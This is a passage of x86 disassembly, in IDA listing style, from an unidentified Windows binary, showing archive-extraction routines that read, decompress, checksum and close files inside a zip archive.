mov eax, [edx+78h]
mov ecx, [ebp+var_C]
lea edx, [eax+ecx+1Eh]
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_8]
mov [ecx], edx
mov eax, [ebp+arg_4]
mov ecx, [eax]
add ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
mov [edx], ecx
mov eax, [ebp+var_4]
loc_40F6AC: ; CODE XREF: sub_40F42B+4C�j
mov esp, ebp
pop ebp
retn
sub_40F42B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F6B0 proc near ; CODE XREF: sub_4107B2+DE�p
; sub_4107B2+3D8�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
cmp [ebp+arg_0], 0
jnz short loc_40F6C6
mov eax, 0FFFFFF9Ah
jmp loc_40F86E
; ---------------------------------------------------------------------------
loc_40F6C6: ; CODE XREF: sub_40F6B0+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
cmp dword ptr [ecx+18h], 0
jnz short loc_40F6DF
mov eax, 0FFFFFF9Ah
jmp loc_40F86E
; ---------------------------------------------------------------------------
loc_40F6DF: ; CODE XREF: sub_40F6B0+23�j
mov edx, [ebp+var_C]
cmp dword ptr [edx+7Ch], 0
jz short loc_40F6F4
mov eax, [ebp+arg_0]
push eax
call sub_40FCA7
add esp, 4
loc_40F6F4: ; CODE XREF: sub_40F6B0+36�j
lea ecx, [ebp+var_10]
push ecx
lea edx, [ebp+var_1C]
push edx
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+var_C]
push ecx
call sub_40F42B
add esp, 10h
test eax, eax
jz short loc_40F71A
mov eax, 0FFFFFF99h
jmp loc_40F86E
; ---------------------------------------------------------------------------
loc_40F71A: ; CODE XREF: sub_40F6B0+5E�j
push 6Ch
call dword_4131C8 ; malloc
add esp, 4
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40F738
mov eax, 0FFFFFF98h
jmp loc_40F86E
; ---------------------------------------------------------------------------
loc_40F738: ; CODE XREF: sub_40F6B0+7C�j
push 4000h
call dword_4131C8 ; malloc
add esp, 4
mov edx, [ebp+var_8]
mov [edx], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+var_1C]
mov [eax+44h], ecx
mov edx, [ebp+var_8]
mov eax, [ebp+var_10]
mov [edx+48h], eax
mov ecx, [ebp+var_8]
mov dword ptr [ecx+4Ch], 0
mov edx, [ebp+var_8]
cmp dword ptr [edx], 0
jnz short loc_40F78C
cmp [ebp+var_8], 0
jz short loc_40F782
mov eax, [ebp+var_8]
push eax
call dword_4131D4 ; free
add esp, 4
loc_40F782: ; CODE XREF: sub_40F6B0+C3�j
mov eax, 0FFFFFF98h
jmp loc_40F86E
; ---------------------------------------------------------------------------
loc_40F78C: ; CODE XREF: sub_40F6B0+BD�j
mov ecx, [ebp+var_8]
mov dword ptr [ecx+40h], 0
mov ecx, [ebp+var_C]
xor edx, edx
cmp dword ptr [ecx+34h], 0
setz dl
mov [ebp+var_14], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov edx, [ecx+3Ch]
mov [eax+54h], edx
mov eax, [ebp+var_8]
mov dword ptr [eax+50h], 0
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [edx+34h]
mov [ecx+64h], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [edx]
mov [ecx+60h], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [edx+0Ch]
mov [ecx+68h], eax
mov ecx, [ebp+var_8]
mov dword ptr [ecx+18h], 0
cmp [ebp+var_14], 0
jnz short loc_40F82E
mov edx, [ebp+var_8]
mov dword ptr [edx+24h], 0
mov eax, [ebp+var_8]
mov dword ptr [eax+28h], 0
mov ecx, [ebp+var_8]
mov dword ptr [ecx+2Ch], 0
mov edx, [ebp+var_8]
add edx, 4
push edx
call sub_40DAB5
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40F82E
mov eax, [ebp+var_8]
mov dword ptr [eax+40h], 1
loc_40F82E: ; CODE XREF: sub_40F6B0+13C�j
; sub_40F6B0+172�j
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [edx+40h]
mov [ecx+58h], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [edx+44h]
mov [ecx+5Ch], eax
mov ecx, [ebp+var_C]
mov edx, [ecx+78h]
mov eax, [ebp+var_18]
lea ecx, [edx+eax+1Eh]
mov edx, [ebp+var_8]
mov [edx+3Ch], ecx
mov eax, [ebp+var_8]
mov dword ptr [eax+8], 0
mov ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [ecx+7Ch], edx
xor eax, eax
loc_40F86E: ; CODE XREF: sub_40F6B0+11�j
; sub_40F6B0+2A�j ...
mov esp, ebp
pop ebp
retn
sub_40F6B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F872 proc near ; CODE XREF: sub_4107B2+103�p
; sub_4107B2+3FC�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push esi
mov [ebp+var_4], 0
mov [ebp+var_10], 0
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_40F89D
mov eax, 0FFFFFF9Ah
jmp loc_40FB64
; ---------------------------------------------------------------------------
loc_40F89D: ; CODE XREF: sub_40F872+1F�j
mov ecx, [ebp+var_C]
mov edx, [ecx+7Ch]
mov [ebp+var_8], edx
cmp [ebp+var_8], 0
jnz short loc_40F8B6
mov eax, 0FFFFFF9Ah
jmp loc_40FB64
; ---------------------------------------------------------------------------
loc_40F8B6: ; CODE XREF: sub_40F872+38�j
mov eax, [ebp+var_8]
cmp dword ptr [eax], 0
jnz short loc_40F8C8
mov eax, 0FFFFFF9Ch
jmp loc_40FB64
; ---------------------------------------------------------------------------
loc_40F8C8: ; CODE XREF: sub_40F872+4A�j
cmp [ebp+arg_8], 0
jnz short loc_40F8D5
xor eax, eax
jmp loc_40FB64
; ---------------------------------------------------------------------------
loc_40F8D5: ; CODE XREF: sub_40F872+5A�j
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
mov [ecx+10h], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
mov [eax+14h], ecx
mov edx, [ebp+var_8]
mov eax, [ebp+arg_8]
cmp eax, [edx+5Ch]
jbe short loc_40F8FE
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
mov eax, [edx+5Ch]
mov [ecx+14h], eax
loc_40F8FE: ; CODE XREF: sub_40F872+7E�j
; sub_40F872:loc_40FB51�j
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+14h], 0
jbe loc_40FB56
mov edx, [ebp+var_8]
cmp dword ptr [edx+8], 0
jnz loc_40F9D1
mov eax, [ebp+var_8]
cmp dword ptr [eax+58h], 0
jbe loc_40F9D1
mov [ebp+var_14], 4000h
mov ecx, [ebp+var_8]
mov edx, [ecx+58h]
cmp edx, [ebp+var_14]
jnb short loc_40F940
mov eax, [ebp+var_8]
mov ecx, [eax+58h]
mov [ebp+var_14], ecx
loc_40F940: ; CODE XREF: sub_40F872+C3�j
cmp [ebp+var_14], 0
jnz short loc_40F94D
xor eax, eax
jmp loc_40FB64
; ---------------------------------------------------------------------------
loc_40F94D: ; CODE XREF: sub_40F872+D2�j
push 0
mov edx, [ebp+var_8]
mov eax, [edx+3Ch]
mov ecx, [ebp+var_8]
add eax, [ecx+68h]
push eax
mov edx, [ebp+var_8]
mov eax, [edx+60h]
push eax
call sub_40E53B
add esp, 0Ch
test eax, eax
jz short loc_40F977
or eax, 0FFFFFFFFh
jmp loc_40FB64
; ---------------------------------------------------------------------------
loc_40F977: ; CODE XREF: sub_40F872+FB�j
mov ecx, [ebp+var_8]
mov edx, [ecx+60h]
push edx
push 1
mov eax, [ebp+var_14]
push eax
mov ecx, [ebp+var_8]
mov edx, [ecx]
push edx
call sub_40E610
add esp, 10h
cmp eax, 1
jz short loc_40F99F
or eax, 0FFFFFFFFh
jmp loc_40FB64
; ---------------------------------------------------------------------------
loc_40F99F: ; CODE XREF: sub_40F872+123�j
mov eax, [ebp+var_8]
mov ecx, [eax+3Ch]
add ecx, [ebp+var_14]
mov edx, [ebp+var_8]
mov [edx+3Ch], ecx
mov eax, [ebp+var_8]
mov ecx, [eax+58h]
sub ecx, [ebp+var_14]
mov edx, [ebp+var_8]
mov [edx+58h], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_8]
mov edx, [ecx]
mov [eax+4], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_14]
mov [eax+8], ecx
loc_40F9D1: ; CODE XREF: sub_40F872+A0�j
; sub_40F872+AD�j
mov edx, [ebp+var_8]
cmp dword ptr [edx+64h], 0
jnz loc_40FABC
mov eax, [ebp+var_8]
mov ecx, [ebp+var_8]
mov edx, [eax+14h]
cmp edx, [ecx+8]
jnb short loc_40F9F7
mov eax, [ebp+var_8]
mov ecx, [eax+14h]
mov [ebp+var_18], ecx
jmp short loc_40FA00
; ---------------------------------------------------------------------------
loc_40F9F7: ; CODE XREF: sub_40F872+178�j
mov edx, [ebp+var_8]
mov eax, [edx+8]
mov [ebp+var_18], eax
loc_40FA00: ; CODE XREF: sub_40F872+183�j
mov [ebp+var_1C], 0
jmp short loc_40FA12
; ---------------------------------------------------------------------------
loc_40FA09: ; CODE XREF: sub_40F872+1C0�j
mov ecx, [ebp+var_1C]
add ecx, 1
mov [ebp+var_1C], ecx
loc_40FA12: ; CODE XREF: sub_40F872+195�j
mov edx, [ebp+var_1C]
cmp edx, [ebp+var_18]
jnb short loc_40FA34
mov eax, [ebp+var_8]
mov ecx, [eax+4]
mov edx, [ebp+var_8]
mov eax, [edx+10h]
mov edx, [ebp+var_1C]
mov esi, [ebp+var_1C]
mov cl, [ecx+esi]
mov [eax+edx], cl
jmp short loc_40FA09
; ---------------------------------------------------------------------------
loc_40FA34: ; CODE XREF: sub_40F872+1A6�j
mov edx, [ebp+var_18]
push edx
mov eax, [ebp+var_8]
mov ecx, [eax+10h]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx+50h]
push eax
call sub_40D535
add esp, 0Ch
mov ecx, [ebp+var_8]
mov [ecx+50h], eax
mov edx, [ebp+var_8]
mov eax, [edx+5Ch]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+5Ch], eax
mov edx, [ebp+var_8]
mov eax, [edx+8]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+8], eax
mov edx, [ebp+var_8]
mov eax, [edx+14h]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+14h], eax
mov edx, [ebp+var_8]
mov eax, [edx+10h]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+10h], eax
mov edx, [ebp+var_8]
mov eax, [edx+4]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+4], eax
mov edx, [ebp+var_8]
mov eax, [edx+18h]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+18h], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_18]
mov [ebp+var_10], edx
jmp loc_40FB51
; ---------------------------------------------------------------------------
loc_40FABC: ; CODE XREF: sub_40F872+166�j
mov [ebp+var_30], 2
mov eax, [ebp+var_8]
mov ecx, [eax+18h]
mov [ebp+var_28], ecx
mov edx, [ebp+var_8]
mov eax, [edx+10h]
mov [ebp+var_2C], eax
mov ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_8]
add edx, 4
push edx
call sub_40DC35
add esp, 8
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov ecx, [eax+18h]
mov [ebp+var_20], ecx
mov edx, [ebp+var_20]
sub edx, [ebp+var_28]
mov [ebp+var_24], edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+var_2C]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx+50h]
push eax
call sub_40D535
add esp, 0Ch
mov ecx, [ebp+var_8]
mov [ecx+50h], eax
mov edx, [ebp+var_8]
mov eax, [edx+5Ch]
sub eax, [ebp+var_24]
mov ecx, [ebp+var_8]
mov [ecx+5Ch], eax
mov edx, [ebp+var_20]
sub edx, [ebp+var_28]
mov eax, [ebp+var_10]
add eax, edx
mov [ebp+var_10], eax
cmp [ebp+var_4], 1
jnz short loc_40FB49
mov eax, [ebp+var_10]
neg eax
sbb eax, eax
and eax, [ebp+var_10]
jmp short loc_40FB64
; ---------------------------------------------------------------------------
loc_40FB49: ; CODE XREF: sub_40F872+2C9�j
cmp [ebp+var_4], 0
jz short loc_40FB51
jmp short loc_40FB56
; ---------------------------------------------------------------------------
loc_40FB51: ; CODE XREF: sub_40F872+245�j
; sub_40F872+2DB�j
jmp loc_40F8FE
; ---------------------------------------------------------------------------
loc_40FB56: ; CODE XREF: sub_40F872+93�j
; sub_40F872+2DD�j
cmp [ebp+var_4], 0
jnz short loc_40FB61
mov eax, [ebp+var_10]
jmp short loc_40FB64
; ---------------------------------------------------------------------------
loc_40FB61: ; CODE XREF: sub_40F872+2E8�j
mov eax, [ebp+var_4]
loc_40FB64: ; CODE XREF: sub_40F872+26�j
; sub_40F872+3F�j ...
pop esi
mov esp, ebp
pop ebp
retn
sub_40F872 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
cmp dword ptr [ebp+8], 0
jnz short loc_40FB7C
mov eax, 0FFFFFF9Ah
jmp short loc_40FB9E
; ---------------------------------------------------------------------------
loc_40FB7C: ; CODE XREF: HSho:0040FB73�j
mov eax, [ebp+8]
mov [ebp-8], eax
mov ecx, [ebp-8]
mov edx, [ecx+7Ch]
mov [ebp-4], edx
cmp dword ptr [ebp-4], 0
jnz short loc_40FB98
mov eax, 0FFFFFF9Ah
jmp short loc_40FB9E
; ---------------------------------------------------------------------------
loc_40FB98: ; CODE XREF: HSho:0040FB8F�j
mov eax, [ebp-4]
mov eax, [eax+18h]
loc_40FB9E: ; CODE XREF: HSho:0040FB7A�j
; HSho:0040FB96�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
cmp dword ptr [ebp+8], 0
jnz short loc_40FBB5
mov eax, 0FFFFFF9Ah
jmp short loc_40FBE3
; ---------------------------------------------------------------------------
loc_40FBB5: ; CODE XREF: HSho:0040FBAC�j
mov eax, [ebp+8]
mov [ebp-8], eax
mov ecx, [ebp-8]
mov edx, [ecx+7Ch]
mov [ebp-4], edx
cmp dword ptr [ebp-4], 0
jnz short loc_40FBD1
mov eax, 0FFFFFF9Ah
jmp short loc_40FBE3
; ---------------------------------------------------------------------------
loc_40FBD1: ; CODE XREF: HSho:0040FBC8�j
mov eax, [ebp-4]
cmp dword ptr [eax+5Ch], 0
jnz short loc_40FBE1
mov eax, 1
jmp short loc_40FBE3
; ---------------------------------------------------------------------------
loc_40FBE1: ; CODE XREF: HSho:0040FBD8�j
xor eax, eax
loc_40FBE3: ; CODE XREF: HSho:0040FBB3�j
; HSho:0040FBCF�j ...
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
cmp dword ptr [ebp+8], 0
jnz short loc_40FBFD
mov eax, 0FFFFFF9Ah
jmp loc_40FCA3
; ---------------------------------------------------------------------------
loc_40FBFD: ; CODE XREF: HSho:0040FBF1�j
mov eax, [ebp+8]
mov [ebp-8], eax
mov ecx, [ebp-8]
mov edx, [ecx+7Ch]
mov [ebp-4], edx
cmp dword ptr [ebp-4], 0
jnz short loc_40FC1C
mov eax, 0FFFFFF9Ah
jmp loc_40FCA3
; ---------------------------------------------------------------------------
loc_40FC1C: ; CODE XREF: HSho:0040FC10�j
mov eax, [ebp-4]
mov ecx, [ebp-4]
mov edx, [eax+48h]
sub edx, [ecx+4Ch]
mov [ebp-0Ch], edx
cmp dword ptr [ebp+0Ch], 0
jnz short loc_40FC36
mov eax, [ebp-0Ch]
jmp short loc_40FCA3
; ---------------------------------------------------------------------------
loc_40FC36: ; CODE XREF: HSho:0040FC2F�j
mov eax, [ebp+10h]
cmp eax, [ebp-0Ch]
jbe short loc_40FC46
mov ecx, [ebp-0Ch]
mov [ebp-10h], ecx
jmp short loc_40FC4C
; ---------------------------------------------------------------------------
loc_40FC46: ; CODE XREF: HSho:0040FC3C�j
mov edx, [ebp+10h]
mov [ebp-10h], edx
loc_40FC4C: ; CODE XREF: HSho:0040FC44�j
cmp dword ptr [ebp-10h], 0
jnz short loc_40FC56
xor eax, eax
jmp short loc_40FCA3
; ---------------------------------------------------------------------------
loc_40FC56: ; CODE XREF: HSho:0040FC50�j
push 0
mov eax, [ebp-4]
mov ecx, [eax+44h]
mov edx, [ebp-4]
add ecx, [edx+4Ch]
push ecx
mov eax, [ebp-4]
mov ecx, [eax+60h]
push ecx
call sub_40E53B
add esp, 0Ch
test eax, eax
jz short loc_40FC7D
or eax, 0FFFFFFFFh
jmp short loc_40FCA3
; ---------------------------------------------------------------------------
loc_40FC7D: ; CODE XREF: HSho:0040FC76�j
mov edx, [ebp-4]
mov eax, [edx+60h]
push eax
push 1
mov ecx, [ebp-0Ch]
push ecx
mov edx, [ebp+0Ch]
push edx
call sub_40E610
add esp, 10h
cmp eax, 1
jz short loc_40FCA0
or eax, 0FFFFFFFFh
jmp short loc_40FCA3
; ---------------------------------------------------------------------------
loc_40FCA0: ; CODE XREF: HSho:0040FC99�j
mov eax, [ebp-10h]
loc_40FCA3: ; CODE XREF: HSho:0040FBF8�j
; HSho:0040FC17�j ...
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FCA7 proc near ; CODE XREF: sub_40ECA8+24�p
; sub_40F6B0+3C�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], 0
cmp [ebp+arg_0], 0
jnz short loc_40FCC4
mov eax, 0FFFFFF9Ah
jmp loc_40FD72
; ---------------------------------------------------------------------------
loc_40FCC4: ; CODE XREF: sub_40FCA7+11�j
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
mov edx, [ecx+7Ch]
mov [ebp+var_8], edx
cmp [ebp+var_8], 0
jnz short loc_40FCE3
mov eax, 0FFFFFF9Ah
jmp loc_40FD72
; ---------------------------------------------------------------------------
loc_40FCE3: ; CODE XREF: sub_40FCA7+30�j
mov eax, [ebp+var_8]
cmp dword ptr [eax+5Ch], 0
jnz short loc_40FD01
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
mov eax, [ecx+50h]
cmp eax, [edx+54h]
jz short loc_40FD01
mov [ebp+var_4], 0FFFFFF97h
loc_40FD01: ; CODE XREF: sub_40FCA7+43�j
; sub_40FCA7+51�j
mov ecx, [ebp+var_8]
cmp dword ptr [ecx], 0
jz short loc_40FD27
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
push ecx
call dword_4131D4 ; free
add esp, 4
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
loc_40FD27: ; CODE XREF: sub_40FCA7+60�j
mov eax, [ebp+var_8]
mov dword ptr [eax], 0
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+40h], 0
jz short loc_40FD48
mov edx, [ebp+var_8]
add edx, 4
push edx
call sub_40DA4C
add esp, 4
loc_40FD48: ; CODE XREF: sub_40FCA7+90�j
mov eax, [ebp+var_8]
mov dword ptr [eax+40h], 0
cmp [ebp+var_8], 0
jz short loc_40FD65
mov ecx, [ebp+var_8]
push ecx
call dword_4131D4 ; free
add esp, 4
loc_40FD65: ; CODE XREF: sub_40FCA7+AF�j
mov edx, [ebp+var_C]
mov dword ptr [edx+7Ch], 0
mov eax, [ebp+var_4]
loc_40FD72: ; CODE XREF: sub_40FCA7+18�j
; sub_40FCA7+37�j
mov esp, ebp
pop ebp
retn
sub_40FCA7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
cmp dword ptr [ebp+8], 0
jnz short loc_40FD8C
mov eax, 0FFFFFF9Ah
jmp loc_40FE1E
; ---------------------------------------------------------------------------
loc_40FD8C: ; CODE XREF: HSho:0040FD80�j
mov eax, [ebp+8]
mov [ebp-4], eax
mov ecx, [ebp+10h]
mov [ebp-8], ecx
mov edx, [ebp-4]
mov eax, [ebp-8]
cmp eax, [edx+8]
jbe short loc_40FDAC
mov ecx, [ebp-4]
mov edx, [ecx+8]
mov [ebp-8], edx
loc_40FDAC: ; CODE XREF: HSho:0040FDA1�j
push 0
mov eax, [ebp-4]
mov ecx, [eax+1Ch]
add ecx, 16h
push ecx
mov edx, [ebp-4]
mov eax, [edx]
push eax
call sub_40E53B
add esp, 0Ch
test eax, eax
jz short loc_40FDCF
or eax, 0FFFFFFFFh
jmp short loc_40FE1E
; ---------------------------------------------------------------------------
loc_40FDCF: ; CODE XREF: HSho:0040FDC8�j
cmp dword ptr [ebp-8], 0
jbe short loc_40FDFD
mov ecx, [ebp+0Ch]
mov byte ptr [ecx], 0
mov edx, [ebp-4]
mov eax, [edx]
push eax
push 1
mov ecx, [ebp-8]
push ecx
mov edx, [ebp+0Ch]
push edx
call sub_40E610
add esp, 10h
cmp eax, 1
jz short loc_40FDFD
or eax, 0FFFFFFFFh
jmp short loc_40FE1E
; ---------------------------------------------------------------------------
loc_40FDFD: ; CODE XREF: HSho:0040FDD3�j
; HSho:0040FDF6�j
cmp dword ptr [ebp+0Ch], 0
jz short loc_40FE1B
mov eax, [ebp-4]
mov ecx, [ebp+10h]
cmp ecx, [eax+8]
jbe short loc_40FE1B
mov edx, [ebp-4]
mov eax, [edx+8]
mov ecx, [ebp+0Ch]
mov byte ptr [ecx+eax], 0
loc_40FE1B: ; CODE XREF: HSho:0040FE01�j
; HSho:0040FE0C�j
mov eax, [ebp-8]
loc_40FE1E: ; CODE XREF: HSho:0040FD87�j
; HSho:0040FDCD�j ...
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FE22 proc near ; CODE XREF: sub_40FF4C+55B�p
; sub_40FF4C+5B8�p ...
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+arg_0]
push eax
call dword_413210 ; gmtime
add esp, 4
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
mov edx, [ecx+14h]
add edx, 76Ch
mov [ebp+var_1C], dx
mov eax, [ebp+var_C]
mov ecx, [eax+10h]
add ecx, 1
mov [ebp+var_1A], cx
mov edx, [ebp+var_C]
mov ax, [edx+0Ch]
mov [ebp+var_16], ax
mov ecx, [ebp+var_C]
mov dx, [ecx+8]
mov [ebp+var_14], dx
mov eax, [ebp+var_C]
mov cx, [eax+4]
mov [ebp+var_12], cx
mov edx, [ebp+var_C]
mov ax, [edx]
mov [ebp+var_10], ax
mov [ebp+var_E], 0
lea ecx, [ebp+var_8]
push ecx
lea edx, [ebp+var_1C]
push edx
call dword_413094 ; SystemTimeToFileTime
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40FE22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FE9E proc near ; CODE XREF: sub_410FDB+6E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
cmp dword ptr [eax], 0
jnz short loc_40FEB8
mov ecx, [ebp+var_10]
cmp dword ptr [ecx+4], 0FFFFFFFFh
jz short loc_40FEC2
loc_40FEB8: ; CODE XREF: sub_40FE9E+F�j
mov eax, 1000000h
jmp loc_40FF46
; ---------------------------------------------------------------------------
loc_40FEC2: ; CODE XREF: sub_40FE9E+18�j
mov edx, [ebp+var_10]
add edx, 138h
push edx
push 104h
call dword_41302C ; GetCurrentDirectoryA
push offset asc_41786C ; "\\"
mov eax, [ebp+var_10]
add eax, 138h
push eax
call sub_411640 ; strcat
add esp, 8
cmp [ebp+arg_8], 1
jnz short loc_40FF0D
mov ecx, [ebp+arg_0]
push ecx
call dword_4130A0 ; GetFileType
mov [ebp+var_C], eax
cmp [ebp+var_C], 1
jz short loc_40FF0D
mov eax, 2000000h
jmp short loc_40FF46
; ---------------------------------------------------------------------------
loc_40FF0D: ; CODE XREF: sub_40FE9E+53�j
; sub_40FE9E+66�j
lea edx, [ebp+var_4]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_40E2F9
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40FF33
mov eax, [ebp+var_4]
jmp short loc_40FF46
; ---------------------------------------------------------------------------
loc_40FF33: ; CODE XREF: sub_40FE9E+8E�j
mov eax, [ebp+var_8]
push eax
call sub_40EA92
add esp, 4
mov ecx, [ebp+var_10]
mov [ecx], eax
xor eax, eax
loc_40FF46: ; CODE XREF: sub_40FE9E+1F�j
; sub_40FE9E+6D�j ...
mov esp, ebp
pop ebp
retn 0Ch
sub_40FE9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF4C proc near ; CODE XREF: sub_4105D7+B9�p
; sub_4107B2+1F5�p ...
var_1E8 = dword ptr -1E8h
var_1E4 = dword ptr -1E4h
var_1E0 = dword ptr -1E0h
var_1DC = dword ptr -1DCh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = byte ptr -1B4h
var_1B3 = byte ptr -1B3h
var_1B2 = byte ptr -1B2h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_8C = byte ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = word ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = word ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_24 = dword ptr -24h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1E8h
mov [ebp+var_1E8], ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jl short loc_40FF71
mov eax, [ebp+var_1E8]
mov ecx, [eax]
mov edx, [ebp+arg_0]
cmp edx, [ecx+4]
jl short loc_40FF7B
loc_40FF71: ; CODE XREF: sub_40FF4C+13�j
mov eax, 10000h
jmp loc_4105D1
; ---------------------------------------------------------------------------
loc_40FF7B: ; CODE XREF: sub_40FF4C+23�j
mov eax, [ebp+var_1E8]
cmp dword ptr [eax+4], 0FFFFFFFFh
jz short loc_40FF98
mov ecx, [ebp+var_1E8]
mov edx, [ecx]
push edx
call sub_40FCA7
add esp, 4
loc_40FF98: ; CODE XREF: sub_40FF4C+39�j
mov eax, [ebp+var_1E8]
mov dword ptr [eax+4], 0FFFFFFFFh
mov ecx, [ebp+var_1E8]
mov edx, [ebp+arg_0]
cmp edx, [ecx+134h]
jnz short loc_40FFDE
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_40FFDE
push 12Ch
mov eax, [ebp+var_1E8]
add eax, 8
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_411634 ; memcpy
add esp, 0Ch
xor eax, eax
jmp loc_4105D1
; ---------------------------------------------------------------------------
loc_40FFDE: ; CODE XREF: sub_40FF4C+68�j
; sub_40FF4C+6E�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz loc_41007B
mov edx, [ebp+var_1E8]
mov eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [eax+4]
mov [ecx], edx
mov eax, [ebp+arg_4]
mov byte ptr [eax+4], 0
